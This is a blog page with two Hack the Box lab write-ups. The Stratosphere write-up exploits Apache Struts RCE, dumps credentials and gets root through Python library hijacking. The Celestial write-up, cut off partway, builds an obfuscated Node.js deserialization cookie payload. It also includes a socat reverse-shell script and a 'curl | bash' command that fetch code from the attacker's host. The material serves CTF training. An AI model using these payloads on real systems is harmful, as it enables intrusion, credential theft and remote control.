dastinia

Hack the Box - Stratosphere Write up

2018-09-01T00:00:00-04:00

Introduction

I don’t have much to say, stratosphere was a great box. Every step to completing this box was extremely logical, and you could pick up tons of neat small little tricks, coupled with a pretty unique priv. esc vector that I’ve never really seen before. Stratosphere overall was an extremely well built box. Hats off to linted for such a great creation.

Tools Used

Enumeration

Like with every HTB machine, lets begin with an nmap scan against Stratosphere (10.10.10.64)

root@dastinia:~/htb/stratosphere# nmap -sV -sC -Pn 10.10.10.64 -oA strat
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-30 19:35 EDT
Nmap scan report for 10.10.10.64
Host is up (0.18s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|   256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_  256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Thu, 30 Aug 2018 23:36:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Transfer-Encoding: chunked
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|   X11Probe:
|     HTTP/1.1 400
|     Date: Thu, 30 Aug 2018 23:36:02 GMT
|_    Connection: close
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Thu, 30 Aug 2018 23:36:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Transfer-Encoding: chunked
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|_    Connection: close
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at [https://nmap.org/cgi-bin/submit.cgi?new-service :
...[snip]...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.22 seconds

From our enumeration we can observe that the following services are available on the host: SSH (22), HTTP Web service (80), and what appears to be another HTTP Web service (8080).

Enumerating Webservice - Port 80

Visiting the webservice on port 80 in a web browser brings us to the “Stratosphere” Web Application landing page. Most HTB boxes follow some sort of theme, or are a reference to some event. (Keeping in mind that the Equifax breach was still fresh)

Clicking on the “Getting Started” URL leads us to a “Site under construction” page as seen below.

Enumerating the site with gobuster reveals the following directories. It seems as though this application is running apache tomcat. Attempting to authenticate to the tomcat manager with usual default credentials fails.

root@dastinia:~/htb/stratosphere# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.64/ -x php,html -s 200,204,301,302,307,403 -t 100  | tee gobuster_strato

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.64/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,403,200,204,301,302
[+] Extensions   : .php,.html
=====================================================
/index.html (Status: 200)
/manager (Status: 302)
/GettingStarted.html (Status: 200)
/Monitoring (Status: 302)

Visiting the /Monitorting web content redirects us to to the “Stratosphere Credit Monitoring” Application.

The application has a unique web file extension of .action which is associated with the Apache Struts url pattern. After some further research, we can learn that it is indeed a well-known extension for the Java WebSphere & Apache Struts applications.

At this particular point if you are familiar with popular infosec news/events, you would know that the U.S Credit Monitoring organization known as “Equifax” was compromised through an unpatched apache struts vulnerability. Based on the similarities, and context clues of the “Stratosphere Credit Monitoring” we can maybe assume that this application is vulnerable to the “Apache Struts” RCE vulnerability.

After some quick googling we come across the following PoC exploit for the Apache Struts, CVE-2017-5638 vulnerability called struts-pwn.

root@dastinia:~/htb/stratosphere# git clone https://github.com/mazen160/struts-pwn.git
Cloning into 'struts-pwn'...
remote: Counting objects: 37, done.
remote: Total 37 (delta 0), reused 0 (delta 0), pack-reused 37
Unpacking objects: 100% (37/37), done.
root@dastinia:~/htb/stratosphere# cd struts-pwn/
root@dastinia:~/htb/stratosphere/struts-pwn# pip install -r requirements.txt
Requirement already satisfied: argparse in /usr/lib/python2.7 (from -r requirements.txt (line 1))
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 2))

validating that the application is vulnerble with struts-pwn

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -h
usage: struts-pwn.py [-h] [-u URL] [-l USEDLIST] [-c CMD] [--check]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  -c CMD, --cmd CMD     Command to execute. (Default: id)
  --check               Check if a target is vulnerable.
root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --check

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] Status: Vulnerable!
[%] Done.

verifying that we have remote code execution

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "id; uname -a"

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: id; uname -a
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64 GNU/Linux

[%] Done.

Now that we know we have successful remote code execution, lets try to escalate our privileges further, and look into getting an interactive shell.

Exploitation

Exploiting Apache Struts RCE with Struts-Pwn

reading contents of /etc/passwd

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "cat /etc/passwd"

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: cat /etc/passwd
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...[snip]...
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
lightdm:x:111:113:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:112:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:113:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:114:118::/var/lib/saned:/bin/false
richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash
tomcat8:x:115:119::/var/lib/tomcat8:/bin/bash
mysql:x:116:120:MySQL Server,,,:/nonexistent:/bin/false

[%] Done.

Lets see what files are available to us in the current working directory of this struts application…

listing contents of current working directory

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "ls -la"

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: ls -la
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

total 24
drwxr-xr-x  5 root    root    4096 Aug 30 19:46 .
drwxr-xr-x 42 root    root    4096 Oct  3  2017 ..
lrwxrwxrwx  1 root    root      12 Sep  3  2017 conf -> /etc/tomcat8
-rw-r--r--  1 root    root      68 Oct  2  2017 db_connect
drwxr-xr-x  2 tomcat8 tomcat8 4096 Sep  3  2017 lib
lrwxrwxrwx  1 root    root      17 Sep  3  2017 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Aug 30 19:46 policy
drwxrwxr-x  4 tomcat8 tomcat8 4096 Feb 10  2018 webapps
lrwxrwxrwx  1 root    root      19 Sep  3  2017 work -> ../../cache/tomcat8

[%] Done.

getting the contents of db_connect

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "cat db_connect"

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: cat db_connect
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

[ssn]
user=ssn_admin
pass=AWs64@on*&

[users]
user=admin
pass=admin

[%] Done.

It seems as though there is a database running on the server. We can enumerate the mysql database through the apache struts exploit. Using the mysql -e parameter we can run mysql commands non-interactively, and receive the output of the queries through stdout.

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin  -e "show databases;"'

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: mysql --user=admin --password=admin  -e "show databases;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

Database
information_schema
users

[%] Done.

enumerating the tables within the mysql ‘users’ database

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin  -e "use users; show tables;"'

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: mysql --user=admin --password=admin  -e "use users; show tables;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

Tables_in_users
accounts

[%] Done.

receiving the contents of the accounts table

root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin  -e "use users; select * from users.accounts;"'

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: mysql --user=admin --password=admin  -e "use users; select * from users.accounts;"
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

fullName        password        username
Richard F. Smith        9tc*rhKuG5TyXvUJOrE^5CK7k       richard

[%] Done.

Attempting to ssh into the box using the richard account, and the password of 9tc*rhKuG5TyXvUJOrE^5CK7k from the mysql database results in

root@dastinia:~/htb/stratosphere/struts-pwn# ssh richard@10.10.10.64
The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
richard@10.10.10.64's password:
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 31 12:57:51 2018 from 10.10.14.108
richard@stratosphere:~$ id
uid=1000(richard) gid=1000(richard) groups=1000(richard),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner)
richard@stratosphere:~$ uname -a
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64 GNU/Linux
richard@stratosphere:~$ cat user.txt
e610b...[snip]...

Privilege Escalation

Upon sshing into the box we see a script called test.py (contents below) which seems to be some sort of a game where we need to find the plaintext for various hashes, at the end of the line we see a call to os.system('/root/sucess.py') We also seem to be able to run the test.py file as the root user, from the output of the sudo -l command.

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
    (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py

contents of test.py file

richard@stratosphere:~$ cat test.py
#!/usr/bin/python3
import hashlib


def question():
    q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
    md5 = hashlib.md5()
    md5.update(q1.encode())
    if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
        print("Sorry, that's not right")
        return
    print("You got it!")
    q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
    sha1 = hashlib.sha1()
    sha1.update(q2.encode())
    if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
        print("Nope, that one didn't work...")
        return
    print("WOW, you're really good at this!")
    q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n")
    md4 = hashlib.new('md4')
    md4.update(q3.encode())
    if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9':
        print("Yeah, I don't think that's right.")
        return
    print("OK, OK! I get it. You know how to crack hashes...")
    q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n")
    blake = hashlib.new('BLAKE2b512')
    blake.update(q4.encode())
    if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943':
        print("You were so close! urg... sorry rules are rules.")
        return

    import os
    os.system('/root/success.py')
    return

question()

Running all the hashes through JTR we discover that the plaintext for the hashes are as follows:

Algo	Hash	Plaintext
MD5	5af003e100c80923ec04d65933d382cb	kaybboo!
SHA1	d24f6fb449855ff42344feff18ee2819033529ff	ninjaabisshinobi
MD4	91ae5fc9ecbca9d346225063f23d2bd9	legend72
BLAKE2b512	hash redacted too long!	Fhero6610

Successfully solving the challenge results in a Permissioned denied on the the sucess.py script so it seems that this may have been a false flag, and we need to do further enumeration for the proper priv. esc vector.

solving test.py

richard@stratosphere:~$ /usr/bin/python3 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
kaybboo!
You got it!
Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff
ninjaabisshinobi
WOW, you're really good at this!
How about this? 91ae5fc9ecbca9d346225063f23d2bd9
legend72
OK, OK! I get it. You know how to crack hashes...
Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
Fhero6610
sh: 1: /root/success.py: Permission denied

Root via Python Library Hijacking

After researching a bit about privilege escalations related to python, you will come across the following blog-post about how to escalate privileges through python library hijacking

If you are familiar with the concept of DLL Search Order Hijacking for the Windows Operating system it’s a similar concept.

In order to exploit this vulnerability, all we have to do is create a python module (that our target script is importing) in the directory of the script that we are attempting to run. Since the test.py script imports the hashlib library we will create a hashlib.py python module, which will load our code over the original hashlib python module.

contents of our hashlib.py python file

richard@stratosphere:~$ cat hashlib.py
import pty
pty.spawn("/bin/sh")

Hack the Box - Celestial Write up

2018-08-25T00:00:00-04:00

Introduction

Celestial was an interesting but very straight forward box. I personally believe Celestial was a good HTB box for learning how to perform quick research to tackle a specific vulnerability in an application that you may not encounter often. As one of the first boxes I completed when I first joined HTB it’s sad to see it go.

Tools Used

Enumeration

Initial Scanning

Like with every HTB machine, lets begin with an nmap scan against Celestial (10.10.10.85)

root@dastinia:~/htb/celestial# nmap -sV -sC -v -Pn --max-rate 500  10.10.10.85 -oA nmap/celestial_initial_scan 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-22 18:45 EDT
...[snip]...
Host is up (0.15s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

NSE: Script Post-scanning.
Initiating NSE at 18:45
Completed NSE at 18:45, 0.00s elapsed
Initiating NSE at 18:45
Completed NSE at 18:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.90 seconds
           Raw packets sent: 1127 (49.588KB) | Rcvd: 1109 (44.364KB)

After allowing a full port scan to run in the background, we discover that only port 3000 is open externally on the box.

Enumerating NodeJS - Port 3000

Visiting the nodejs application on port 3000 in a browser brings us to the following page stating that 2 + 2 is 22.

Attempting to enumerate the service with gobuster revealed no actionable results.

root@dastinia:~/htb/celestial# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.85:3000 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_celestial

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.85:3000/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,403,200,204,301,302
[+] Extensions   : .php,.html
=====================================================

Inspecting the request in burp we can observe a cookie being set by the server with the key profile. This stands out because from the cookie string this is likely base64 encoded json data which we can tell by the following indicator _ey_, and that the data is most likely url encoded as well by the %3D%3D, which is the url-encoded version of == at the end of the cookie string.

Using Burp Suite’s Decoder module, we first URL decode the original string, then base64 decode the resultant data to get our original json object.

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

After some googling for “NodeJS” vulnerabilities, you will come across the following articles for CVE-2017-5941 a NodeJS deserialization vulnerability.

To sum up the vulnerability - the http cookie value is passed to an unserialze() function, and since we (the attacker) have control over the cookie, we can craft a payload that will exploit the vulnerability.

References: 1 - 2 - 3 - 4

Exploitation

Using the following tool: Node_Shell we can craft a payload to exploit this de-serialization vulnerability.

Lets first create a small test payload to validate that this is an exploitable vulnerability…

root@dastinia:~/htb/celestial# python node_shell.py -c "curl http://10.10.15.10/hello" -o -e

    =======> Happy hacking <======


    {"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,104,101,108,108,111,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()"}

We will take the take the json object, and base64 encode it.

root@dastinia:~/htb/celestial# echo -n '{"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,104,101,108,108,111,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()"}' | base64
eyJydW4iOiAiXyQkTkRfRlVOQyQkX2Z1bmN0aW9uICgpe2V2YWwoU3RyaW5nLmZyb21DaGFyQ29k
ZSgxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTQsMTAxLDExMywxMTcsMTA1LDExNCwxMDEs
NDAsMzksOTksMTA0LDEwNSwxMDgsMTAwLDk1LDExMiwxMTQsMTExLDk5LDEwMSwxMTUsMTE1LDM5
LDQxLDQ2LDEwMSwxMjAsMTAxLDk5LDQwLDM5LDk5LDExNywxMTQsMTA4LDMyLDEwNCwxMTYsMTE2
LDExMiw1OCw0Nyw0Nyw0OSw0OCw0Niw0OSw0OCw0Niw0OSw1Myw0Niw0OSw0OCw0NywxMDQsMTAx
LDEwOCwxMDgsMTExLDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwx
MDEsMTE0LDExNCwxMTEsMTE0LDQ0LDMyLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQ0LDMyLDEx
NSwxMTYsMTAwLDEwMSwxMTQsMTE0LDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwz
MiwzMiwzMiwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDgsMTExLDEwMyw0
MCwxMDEsMTE0LDExNCwxMTEsMTE0LDQxLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMy
LDMyLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwx
MTYsMTAwLDExMSwxMTcsMTE2LDQxLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDEyNSw0MSwx
MCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMikpfSgpIn0=

Now all we have to do is intercept a request, while setting the profile cookie, remembering to urlencode any = characters we have with %3D

Doing so results in successful code execution.

We can now very easily change our poc to give us a reverse shell in a variety of ways. For example the following payload will download + execute a socat reverse shell.

contents of socat.sh

#!/usr/bin/env bash
wget -q http://10.10.15.10:9999/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.10:8181

using node_shell.py to create payload

root@dastinia:~/htb/celestial# python node_shell.py -c "curl http://10.10.15.10/socat.sh | bash" -o -e

    =======> Happy hacking <======


    {"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,115,111,99,97,116,46,115,104,32,124,32,98,97,115,104,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()"}

base64 encoding payload

root@dastinia:~/htb/celestial# echo -n '{"run": "_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,115,111,99,97,116,46,115,104,32,124,32,98,97,115,104,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()"}' | base64 | tr -d '\n'
